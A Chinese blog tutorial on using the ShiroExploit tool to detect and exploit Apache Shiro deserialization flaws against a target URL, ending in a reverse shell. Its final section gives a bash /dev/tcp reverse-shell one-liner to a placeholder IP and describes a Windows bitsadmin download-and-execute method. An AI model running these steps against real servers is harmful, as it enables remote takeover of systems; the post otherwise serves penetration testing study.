您当前的位置: 首页 > 

星球守护者

暂无认证

  • 2浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Shiro漏洞工具的使用

星球守护者 发布时间:2020-07-03 15:47:15 ,浏览量:2

文章目录
      • 01 下载ShiroExploit.V2.3,并运行.jar
      • 02 运行后的界面
      • 03输入测试的url
      • 04 选择检测方式
      • 05 判断是否存在漏洞的依据
      • 06 反弹shell

01 下载ShiroExploit.V2.3,并运行.jar
  • 在github上直接搜索下载
  • 有源码,可以自己编译成.jar 在这里插入图片描述
02 运行后的界面
  • Shiro550无需选择操作系统类型,
  • Shiro721需要选择操作系统类型
  • 复杂Http请求支持直接粘贴数据包

在这里插入图片描述

03输入测试的url
  • 可以自己直接输入被检测是否存在shire反序列漏洞的地址

在这里插入图片描述

04 选择检测方式
  • CEYE.IO
可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload 
  • dnslog.cn
 可以不进行任何配置,每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload 
缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录

在这里插入图片描述

05 判断是否存在漏洞的依据
  • 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入。
  • 当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令。

在这里插入图片描述 在这里插入图片描述

06 反弹shell
  • 反弹shell(linux)采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1的方式反弹 shell
  • 反弹shell(Windows)采用 bitsadmin下载指定 URL 的 exe 文件并执行的方式获取 shell
  • 如果反弹shell无法成功,可能自己的阿里云主机的端口未开放 在这里插入图片描述

参考链接:https://github.com/feihong-cs/ShiroExploit

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.0502s